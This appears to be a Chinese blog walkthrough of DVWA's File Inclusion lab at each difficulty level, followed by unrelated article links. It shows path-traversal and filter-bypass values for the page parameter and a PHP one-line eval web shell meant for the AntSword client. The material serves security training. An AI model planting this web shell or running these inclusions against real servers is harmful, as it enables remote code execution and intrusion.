当前位置: 首页 > news >正文

dvwa4——File Inclusion

 LOW:

先随便点开一个文件,可以观察到url栏变成这样,说明?page=是dvwa当前关卡用来加载文件的参数

http://10.24.8.35/DVWA/vulnerabilities/fi/?page=file1.php

我们查看源码 ,没有什么过滤,直接尝试访问其他文件

在url栏的page处做一些修改,我们改动page后为如下代码

?page=../../phpinfo.php

../(上级目录指示符号):

从内向外跳,先随便测试一个不存在的文件名,报错,但可以看出我们要查询的目标文件(phpinfo),在dvwa层的目录里,还有两层的距离,所以我们输入两个../


 爆出信息

 说明dvwa文件目录里的可以运行

我们在dvwa文件夹里新建一个测试文件testd1.exe

输入想要的内容然后ctrl-s保存 (这很重要(悲))

在 url 里写代码

ps!:服务器会把我们包含的任何文件作为php代码执行,如果包含有效的代码,执行并返回i结果,如果不是php代码,就直接回显文件内容

?page=../../testd1.txt

回显成功 

现在我们把文件后缀改成php,内容改成php一句话木马,打开中国蚁剑

<?php @eval($_POST['password']);?>

 

MEDIUM:

观察源码:

发现这一关将http://,https://,../,..\ 全部替换为了空格 

个人解决的一点疑问:这里的过滤仅仅针对page的参数,而不是应用于整个url

所以这一关我们把相对路径( ../ )换成绝对路径就行~

http://10.24.15.188/DVWA/vulnerabilities/fi/?page=D:\nginx-1.27.5\html\DVWA\testd1.php

其余爆数据与low一样

HIGH:

查看源码:

用fnmatch函数检查page之后的文件名是否以file开头,或者文件名是否为include

所以我们把文件名改成filedi.php, 其余爆数据与low一样

IMPOSSIBLE:

分析源码:


白名单(whitelist):

与黑名单(Blacklist)相反

  • 黑名单:禁止已知的危险项,放行其他内容(如:过滤 ../ )。

  • 白名单:只允许已知的安全项,拒绝其他所有内容(如:只允许 incude.php)。


所以无论怎么构造,都只能包含这四个文件,无解

❀❀❀ 完结撒花!!!❀❀❀

相关文章:

  • [Java恶补day13] 53. 最大子数组和
  • 【LeetCode 热题100】回溯:括号生成 组合总和(力扣22 / 39 )(Go语言版)
  • 12.1 GUI 事件处理
  • 截图工具 Snipaste V2.10.7(2025.06.2更新)
  • java Semaphore‌
  • 题目 3225: 蓝桥杯2024年第十五届省赛真题-回文字符串
  • 数据库MySQL集群MGR
  • 【Block总结】LRSA,局部区域自注意力|即插即用
  • 爬虫的几种方式(使用什么技术来进行一个爬取数据)
  • Android第十二次面试GetX库渲染机制
  • ThinkPrune:在RL中引入长度限制,在保持性能一致或略有提升下,显著提升推理效率
  • vue router详解和用法
  • 极客时间:用 FAISS、LangChain 和 Google Colab 模拟 LLM 的短期与长期记忆
  • ubuntu安装devkitPro
  • day44 python 训练CNN网络并使用Grad-CAM可视化
  • c++类和对象-继承
  • Spring框架学习day6--事务管理
  • DeepSeek 赋能车路协同:智能交通的破局与重构
  • Fisher准则例题——给定类内散度矩阵和类样本均值
  • Linux——计算机网络基础
  • 郑州制作个人网站/域名注册服务网站哪个好
  • 天津宇昊建设集团有限公司网站/做推广公司
  • 区政府网站自查整改和制度建设/有什么软件可以推广
  • 男男做受网站/中小企业管理培训班
  • 龙泉网站建设/百度最容易收录的网站
  • 研究思路 网站建设/云南网站建设快速优化